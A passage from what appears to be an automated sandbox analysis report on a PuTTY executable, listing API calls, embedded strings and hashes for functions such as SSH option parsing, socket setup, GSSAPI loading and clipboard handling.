                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoadQueryValue$CloseOpen
                            • String ID: AcquireCredentialsHandleA$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from user-specified library '%s'$\bin\gssapi32.dll$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_release_buffer$gss_release_cred$gss_release_name$secur32.dll
                            • API String ID: 481383669-4140184695
                            • Opcode ID: 2108d3fb54c964d982f4a639e771a56639495aac7d649db11cf17e573ce93ade
                            • Instruction ID: dcd7c7f827d472f1284be5c32c41cc90b0e63d8da783b99a3823c4c507cf7148
                            • Opcode Fuzzy Hash: 2108d3fb54c964d982f4a639e771a56639495aac7d649db11cf17e573ce93ade
                            • Instruction Fuzzy Hash: DF71A0B1A40306BBD7109F769CC9A2ABFECFB44755B50042BF448D7691EBB8E4108E9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                            • _strlen.LIBCMT ref: 00401798
                            • _strlen.LIBCMT ref: 00401CDA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %.*s$%c%.*s$-%c expects at least two colons in its argument$-agent$-ipv4$-ipv6$-load$-loghost$-nc$-nc expects argument of form 'host:port'$-noagent$-nopageant$-nopagent$-pageant$-pagent$-pw$-raw$-rlogin$-sercfg$-serial$-ssh$-telnet$1.5$L%s$Unrecognised suboption "-sercfg %c"$Unrecognised suboption "-sercfg %s"$the -pw option can only be used with the SSH protocol$the -sercfg option can only be used with the serial protocol$unable to open command file "%s"
                            • API String ID: 1497175149-3160668167
                            • Opcode ID: 850225c6b70dc2e53f97a4abb77eb0d96d229cb41292139f45c1cd0b29a92017
                            • Instruction ID: 075547cb0e17a4f786c5e50b4f43e74b565f1ebd088bad941454779dac3cf793
                            • Opcode Fuzzy Hash: 850225c6b70dc2e53f97a4abb77eb0d96d229cb41292139f45c1cd0b29a92017
                            • Instruction Fuzzy Hash: F772EF31648305BAFF216E66AD42BAB3B59DF1072DF20403FFD04F91E2EA798A50954D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SelectObject.GDI32(?), ref: 0043E9DB
                            • SetTextColor.GDI32(?,?), ref: 0043E9E5
                            • SetBkColor.GDI32(?,?), ref: 0043E9EF
                            • SetBkMode.GDI32(?,00000002), ref: 0043EA0B
                            • SetTextAlign.GDI32(?,00000006), ref: 0043EAFB
                            • SetTextAlign.GDI32(?,00000000), ref: 0043EB1A
                            • IsDBCSLeadByteEx.KERNEL32(00000000), ref: 0043ED37
                            • MultiByteToWideChar.KERNEL32(00000004,?,00000002,00000000,00000001), ref: 0043ED7C
                            • MultiByteToWideChar.KERNEL32(00000004,?,00000001,00000000,00000001), ref: 0043EDA4
                            • ExtTextOutW.GDI32(?,00000003,?,00000001,?,00000000,?), ref: 0043EE0E
                            • SetBkMode.GDI32(?,00000001), ref: 0043EE24
                            • ExtTextOutW.GDI32(?,?,?,00000004,?,00000000,?), ref: 0043EE59
                            • ExtTextOutA.GDI32(?,00000003,?,00000001,?,00000000,?,?), ref: 0043EF01
                            • SetBkMode.GDI32(?,00000001), ref: 0043EF1F
                            • ExtTextOutA.GDI32(?,?,?,00000004,?,?,?), ref: 0043EF52
                            • SetBkMode.GDI32(?,00000001), ref: 0043F010
                            • ExtTextOutW.GDI32(?,00000002,?,00000004,?,?,?), ref: 0043F040
                            • SetBkMode.GDI32(?,00000001), ref: 0043F04B
                            • CreatePen.GDI32(00000000,00000000,?), ref: 0043F0A8
                            • SelectObject.GDI32(?,00000000), ref: 0043F0B9
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0043F0CA
                            • LineTo.GDI32(?,?,00000000), ref: 0043F0DA
                            • SelectObject.GDI32(?,?), ref: 0043F0E4
                            • DeleteObject.GDI32(00000000), ref: 0043F0E7
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Text$Mode$Object$ByteSelect$AlignCharColorMultiWide$CreateDeleteLeadLineMove
                            • String ID: $ $@
                            • API String ID: 1635212989-2546599590
                            • Opcode ID: cd1a0294ed076e746248242b1afd7c9b67e3a8d0cfc10c3198c2fcd4b813f67e
                            • Instruction ID: fcd5226076300c76bdccf7a7b53959c2d364e10a73a60483dbf8312a0e74719b
                            • Opcode Fuzzy Hash: cd1a0294ed076e746248242b1afd7c9b67e3a8d0cfc10c3198c2fcd4b813f67e
                            • Instruction Fuzzy Hash: 7D62D171D0120ADFDF24DF59D844AEEBBB6FF48314F55502AE805A72A1C3399982CF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegisterClipboardFormatA.USER32(commctrl_DragListMsg), ref: 0043BAA7
                            • SetMapMode.GDI32(?,00000001), ref: 0043BB2E
                            • _strlen.LIBCMT ref: 0043BB3B
                            • GetTextExtentPoint32A.GDI32(0000002B,?,00000000,?), ref: 0043BB48
                            • DrawEdge.USER32(0000002B,?,00000006,0000200F), ref: 0043BB5C
                            • _strlen.LIBCMT ref: 0043BB65
                            • TextOutA.GDI32(0000002B,?,?,?,00000000), ref: 0043BB96
                            • GetDC.USER32(00000000), ref: 0043BC6A
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043BC78
                            • MulDiv.KERNEL32(?,00000000), ref: 0043BC82
                            • ReleaseDC.USER32(00000000,00000111), ref: 0043BC92
                            • _strncpy.LIBCMT ref: 0043BCD9
                            • ChooseFontA.COMDLG32(?,?,?), ref: 0043BD12
                            • GetDlgItemTextA.USER32(00000000,?,?,00000104), ref: 0043BE5C
                            • SetDlgItemTextA.USER32(?,?,?), ref: 0043BEA2
                            • SetCapture.USER32(?,?,?), ref: 0043BFA1
                            • IsDlgButtonChecked.USER32(?,?), ref: 0043C095
                            • SendDlgItemMessageA.USER32(?,?,00000147,00000000,00000000), ref: 0043C151
                            • SendDlgItemMessageA.USER32(?,?,00000149,00000000,00000000), ref: 0043C169
                            • SendDlgItemMessageA.USER32(?,?,00000148,?,00000000), ref: 0043C18D
                            • SetDlgItemTextA.USER32(?,?,00000111), ref: 0043C19D
                            • ChooseColorA.COMDLG32(004749F8,?,?), ref: 0043C237
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Item$Text$MessageSend$Choose_strlen$ButtonCapsCaptureCheckedClipboardColorDeviceDrawEdgeExtentFontFormatModePoint32RegisterRelease_strncpy
                            • String ID: commctrl_DragListMsg
                            • API String ID: 3050678439-3283919134
                            • Opcode ID: c1376d861db42fd75a3b72eb54fef33b38f965c8d08fa85fbcbb3880b49e12ff
                            • Instruction ID: a325c5f0360600cf968f32fdb505208d5f7018e00c26882bcd5c471407e08528
                            • Opcode Fuzzy Hash: c1376d861db42fd75a3b72eb54fef33b38f965c8d08fa85fbcbb3880b49e12ff
                            • Instruction Fuzzy Hash: 8C32C0356402099FEF24DF78CC89BEB3BE5FB08304F54552AFA4596292C778D881CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • closesocket.WS2_32(?), ref: 0044784F
                            • socket.WS2_32(00000002,00000001,00000000), ref: 004478A4
                            • WSAGetLastError.WS2_32 ref: 004478B5
                            • setsockopt.WS2_32(00000000,0000FFFF,00000100,?,00000004), ref: 004478E0
                            • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004478FB
                            • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 00447916
                            • htons.WS2_32(?), ref: 00447959
                            • htonl.WS2_32(00000000), ref: 00447970
                            • htons.WS2_32(?), ref: 0044797A
                            • bind.WS2_32(?,00000002,?), ref: 0044798E
                            • WSAGetLastError.WS2_32 ref: 00447999
                            • htons.WS2_32(?), ref: 004479E1
                            • htonl.WS2_32(00000000), ref: 00447A57
                            • htons.WS2_32(?), ref: 00447A67
                            • connect.WS2_32(?,?,?), ref: 00447A96
                            • WSAGetLastError.WS2_32 ref: 00447AA1
                            Strings
                            • ..\windows\winnet.c, xrefs: 00447A33
                            • sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses, xrefs: 00447A38
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: htons$ErrorLastsetsockopt$htonl$bindclosesocketconnectsocket
                            • String ID: ..\windows\winnet.c$sock->addr->addresses && sock->step.curraddr < sock->addr->naddresses
                            • API String ID: 787393233-2945477696
                            • Opcode ID: 9fe65324e70c465eddc718bd15c66d16e44d0bb2db8d6d4797a80e7316a8274f
                            • Instruction ID: 3341e483994d4776ef4eb118c4776083d6fa58ad43227f29a374a405655d0fba
                            • Opcode Fuzzy Hash: 9fe65324e70c465eddc718bd15c66d16e44d0bb2db8d6d4797a80e7316a8274f
                            • Instruction Fuzzy Hash: 5D91C375904204EFEF14DFA4DC89AAE7BB5FF44310F10406AF905AB2A1D7399D86CB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetKeyboardLayout.USER32(00000000), ref: 004415DA
                            • GetKeyboardState.USER32(?), ref: 004415EA
                            • SetKeyboardState.USER32(?), ref: 00441678
                            • SendMessageA.USER32(00000115,00000001,00000000), ref: 004418AC
                            • SendMessageA.USER32(00000112,0000F100,00000000), ref: 00441967
                            • ToUnicodeEx.USER32(00000090,?,?,00475C84,00000003,00000000,?), ref: 0044210F
                            • ToAsciiEx.USER32(00000090,?,?,00474CB0,00000000,?), ref: 00442127
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00474CA0,00000000,00475C84,00000003), ref: 00442160
                            • MessageBeep.USER32(00000010), ref: 00442386
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: KeyboardMessage$SendState$AsciiBeepByteCharLayoutMultiUnicodeWide
                            • String ID: !$HL.FIG$MNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz@[\]^_`{
                            • API String ID: 2897891004-300343931
                            • Opcode ID: 27d73e3d702d9a115b97bbdbc4e975c23c6655d4ee1e6b5026d0bdc08e7830bb
                            • Instruction ID: 5d6b3412210c4c334c10d6b1b212689347c3b2fe7486aaa19bb9981c70aa288a
                            • Opcode Fuzzy Hash: 27d73e3d702d9a115b97bbdbc4e975c23c6655d4ee1e6b5026d0bdc08e7830bb
                            • Instruction Fuzzy Hash: 09924534944346DAFF308B648D85BBA7B60EB11304F68417BE945AA2F1D7BC8DC1D64E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • socket.WS2_32(?,00000001,00000000), ref: 004483BD
                            • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000028,00000004), ref: 004483E5
                            • htons.WS2_32(00000000), ref: 0044841F
                            • inet_addr.WS2_32(00000028), ref: 00448441
                            • htonl.WS2_32(00000000), ref: 00448450
                            • htonl.WS2_32(00000000), ref: 00448477
                            • htons.WS2_32(00000000), ref: 00448483
                            • bind.WS2_32(00000000,00000002,-00000011), ref: 004484A3
                            • WSAGetLastError.WS2_32(?,0041730D,00000000), ref: 004484AE
                            • closesocket.WS2_32(00000000), ref: 004484BC
                            • listen.WS2_32(00000000,7FFFFFFF), ref: 004484CD
                            • closesocket.WS2_32(00000000), ref: 004484D9
                            • WSAGetLastError.WS2_32(?,0041730D,00000000,000000FF), ref: 004484DF
                            • closesocket.WS2_32(00000000), ref: 00448502
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: closesocket$ErrorLasthtonlhtons$bindinet_addrlistensetsockoptsocket
                            • String ID:
                            • API String ID: 1450300857-0
                            • Opcode ID: e3fa393f272722b80073e3e12a82d894a00d0f87b1effe1bca63d2dac4bfcfeb
                            • Instruction ID: 6c6c32b6e9c9e366d512557becd12a5c420c6d5e5fadaefa89a3948435047660
                            • Opcode Fuzzy Hash: e3fa393f272722b80073e3e12a82d894a00d0f87b1effe1bca63d2dac4bfcfeb
                            • Instruction Fuzzy Hash: 3B61C4B1800215EFDF119F68DC859AE7BB9FF04710F50816FF915EA295EB388980CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000107,?,004744D8), ref: 00448710
                            • FindFirstFileA.KERNEL32(?,?,?,004744D8), ref: 00448737
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0044875F
                            • FindClose.KERNEL32(00000000), ref: 0044876A
                            • GetCurrentProcessId.KERNEL32(?,004744D8), ref: 00448770
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004487AD
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 004487CB
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004487E9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressFindProc$File$CloseCurrentDirectoryFirstNextProcessWindows
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 2228959178-129414566
                            • Opcode ID: 74ddc8c1fecc973de86fee2575f10d40a10883520a12c04d4ec1d513933536e7
                            • Instruction ID: 3744fb77f819d778f2b961216f66e9ae5224397a93bc2e9dcc997c5b6324f5ac
                            • Opcode Fuzzy Hash: 74ddc8c1fecc973de86fee2575f10d40a10883520a12c04d4ec1d513933536e7
                            • Instruction Fuzzy Hash: 65415271908344AAEB11AB75EC89E9E77A8B744710F64057FF20CD2191EF38D9848F2C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00450F05
                            • _strcat.LIBCMT ref: 00450F22
                            • _strncpy.LIBCMT ref: 00450F30
                            • _strncpy.LIBCMT ref: 00450FDA
                            • GetTimeZoneInformation.KERNEL32(004771C8,00000014,00000014,00408DF6,00000014,00000014,?,004510F7,0044D642,00457BC4,0000000B,?,0044DBCD,?,0043D0FD,00000000), ref: 0045100A
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004771CC,000000FF,0000003F,00000000,0043D0FD,?,004510F7,0044D642,00457BC4,0000000B,?,0044DBCD,?,0043D0FD), ref: 00451096
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00477220,000000FF,0000003F,00000000,0043D0FD,?,004510F7,0044D642,00457BC4,0000000B,?,0044DBCD,?,0043D0FD), ref: 004510C8
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_strncpy$InformationTimeZone_strcat_strlen
                            • String ID: 0<G$p<G
                            • API String ID: 2060319238-1284424790
                            • Opcode ID: ec861debd5a2c793a05b2d7c3474a6a9a7c664b5552b9db06a8107eecf769ccc
                            • Instruction ID: fa65c10d195800a2bb9ff7c1aaa14f6f66fa04bc392ef3923f0b3ad9e349813e
                            • Opcode Fuzzy Hash: ec861debd5a2c793a05b2d7c3474a6a9a7c664b5552b9db06a8107eecf769ccc
                            • Instruction Fuzzy Hash: 4C614872404290AFE721CF259D819267BA8FB01312754017FE848D72B3DB784ECADB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: $@$gvE
                            • API String ID: 0-2332325672
                            • Opcode ID: e02b2e8b590c79bc9b64bba3ffddabde671a9d734afc96b1e1c1685ae40563ec
                            • Instruction ID: 8c12aa0fbdc09fe74b6a71224cccc7f4bd71076c3ca8cc0daf925b9355c6cdc3
                            • Opcode Fuzzy Hash: e02b2e8b590c79bc9b64bba3ffddabde671a9d734afc96b1e1c1685ae40563ec
                            • Instruction Fuzzy Hash: 18B2F331604A06ABDF259E64C8C57A637A1BF0D304F29A0BBEC45CE29AD77CDC41CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GlobalAlloc.KERNEL32(00002002,?,00000000,?,00000000,0043C4AF,00000000,00000000,?,00000001), ref: 0043F882
                            • GlobalLock.KERNEL32(00000000,000003E9,?,00000000,0043C4AF,00000000,00000000,?,00000001), ref: 0043F896
                            • GlobalUnlock.KERNEL32(00000000), ref: 0043F8B4
                            • SendMessageA.USER32(00008002,00000001,00000000), ref: 0043F8D5
                            • OpenClipboard.USER32 ref: 0043F8DD
                            • EmptyClipboard.USER32 ref: 0043F8E7
                            • SetClipboardData.USER32(00000001,00000000), ref: 0043F8F0
                            • CloseClipboard.USER32 ref: 0043F8F6
                            • GlobalFree.KERNEL32(00000000), ref: 0043F8FF
                            • SendMessageA.USER32(00008002,00000000,00000000), ref: 0043F914
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ClipboardGlobal$MessageSend$AllocCloseDataEmptyFreeLockOpenUnlock
                            • String ID:
                            • API String ID: 1228832834-0
                            • Opcode ID: 3bfec59b50e83a7944db25860687c562f2dda46f7e2aaa7fd508b8c1243ddbde
                            • Instruction ID: ba892d88f1dd8a87cb05bb373ab5e1d76ca95c2fa7a33c581d212d91454e4f63
                            • Opcode Fuzzy Hash: 3bfec59b50e83a7944db25860687c562f2dda46f7e2aaa7fd508b8c1243ddbde
                            • Instruction Fuzzy Hash: 5C113071909316BFD7202F61BC48E2B7F6DEF49356F040079F94592132D7399C48CA69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CountTick
                            • String ID: ..\terminal.c$@$x > 0
                            • API String ID: 536389180-1092019167
                            • Opcode ID: 5014f5d673744616f24ecce89310486fb780dbff6e2148fe78b231da2bd780e1
                            • Instruction ID: a6f37c5e7e3cfc75f0ab7c5c6af324179d6ad7854516f91427e95bbade365495
                            • Opcode Fuzzy Hash: 5014f5d673744616f24ecce89310486fb780dbff6e2148fe78b231da2bd780e1
                            • Instruction Fuzzy Hash: B5A2D3305006419BDF28AE24C8857E637A1FF9D304F2861BBED568E297D77CA881CB59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetVersionExA.KERNEL32(?,00470420,00000060), ref: 0044F145
                            • GetModuleHandleA.KERNEL32(00000000,?,00470420,00000060), ref: 0044F198
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: HandleModuleVersion
                            • String ID:
                            • API String ID: 3651626284-0
                            • Opcode ID: e81ed661582ea169cb5219fb535b1267bfdef511a8b45d8bdf5f75cf2ba8aa19
                            • Instruction ID: 393ef14354683b73db286a3f3db13eb5f110189a63a210ca0f0c1b3f5791f5db
                            • Opcode Fuzzy Hash: e81ed661582ea169cb5219fb535b1267bfdef511a8b45d8bdf5f75cf2ba8aa19
                            • Instruction Fuzzy Hash: 0D219CB1D047208BEB21AFA6EC0565E7BA4FF45306B50047FF808A7322D7789946CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,00000000,0000FFFF,00000000,?,?,?,7556E010,0044081D,00449E36,00000000), ref: 00446595
                            • GetLastError.KERNEL32(?,?,7556E010,0044081D,00449E36,00000000), ref: 004465A0
                            • _strlen.LIBCMT ref: 004465C0
                            • _strlen.LIBCMT ref: 004465DE
                            Strings
                            • Windows error code %d (and FormatMessage returned %d), xrefs: 004465AB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ErrorFormatLastMessage
                            • String ID: Windows error code %d (and FormatMessage returned %d)
                            • API String ID: 63550713-3310111201
                            • Opcode ID: 68d8155354ea594900905a63553f2a2c5c520a76aae7e0025536ed256ec0cf91
                            • Instruction ID: d0f0a069aac5f51432b7eb2b2fa1fd8f6c635a0b28679f1cc0315203cd42be50
                            • Opcode Fuzzy Hash: 68d8155354ea594900905a63553f2a2c5c520a76aae7e0025536ed256ec0cf91
                            • Instruction Fuzzy Hash: C12104B0A44300BFF7315B61AC02F277BD8DF01B14F11442EF589961D2EB799800875E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
